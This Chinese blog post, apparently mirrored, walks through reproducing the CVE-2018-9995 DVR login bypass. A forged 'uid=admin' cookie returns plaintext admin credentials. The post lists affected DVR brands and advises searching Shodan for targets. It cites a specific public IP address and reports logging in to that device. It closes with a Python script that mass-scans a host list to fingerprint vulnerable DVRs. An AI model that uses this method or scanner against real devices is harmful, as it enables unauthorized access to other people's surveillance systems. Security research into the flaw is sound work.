zoukankan      html  css  js  c++  java
  • DVR登录绕过漏洞_CVE-2018-9995漏洞复现

    DVR登录绕过漏洞_CVE-2018-9995漏洞复现

    一、漏洞描述

    此漏洞允许攻击者通过修改”Cookie:uid=admin”之后访问特定DVR的控制面板,返回此设备的明文管理员凭证。

    二、影响软件以及版本

    Novo

    CeNova

    QSee

    Pulnix

    XVR 5 in 1 (title: "XVR Login")

    Securus, - Security. Never Compromise !! -

    Night OWL

    DVR Login

    HVR Login

    MDVR Login

    三、漏洞复现

    1、搜索引擎获取有可能存在漏洞的设备

    使用shodan、google等搜索引擎

      

      

    2、访问http://114.33.109.175/login.rsp

      

    3、burp抓包,构造poc,放包发现获得登录凭证

      

    4、使用获得账户密码登录,成功登录

      

    5、批量检查是否存在CVE-2018-9995漏洞(poc),脚本如下

    import sys 
    import requests
    import re
     
    def check_host(host):
     
        try:
     
            print("Checking : %s"%host)
     
            url = 'http://' + host+'/login.rsp'
     
            rr= requests.get(url,timeout=30,allow_redirects=False)
     
            if rr.status_code == 200 and re.findall("GNU rsp/1.0", rr.headers["Server"]):
     
                print("[*] CVE-2018-9995 Detection :Url is %s"%url)
     
                ff=open('result.txt','a+')
     
                ff.write('%s
    '%(url))
     
        except:
     
            pass
     
    if __name__ == '__main__':
     
        if len(sys.argv) < 2:
     
            print("""Usage: Python3 CVE-2018-9995.py host.txt
     
    host.txt:127.0.0.1:8080 or baidu.com
     
    """)
     
        if len(sys.argv) >= 2:
     
            file = open(sys.argv[1])
     
            for i in file:
     
                i = i.strip()
     
                check_host(i)
     
            file.close()

    6、运行脚本

      

     

  • 相关阅读:
    小程序登录页面
    小程序环境搭建
    js闭包
    作用域和作用域链及预解析
    高阶函数
    在.net core项目中,增加gulp打包任务
    阿里云部署docker-swarm 内网问题
    .net identity scaffold
    c#中对XML反序列化
    c# Reactive Extension中的FromEventPattern和FromEvent
  • 原文地址:https://www.cnblogs.com/yuzly/p/11105086.html
Copyright © 2011-2022 走看看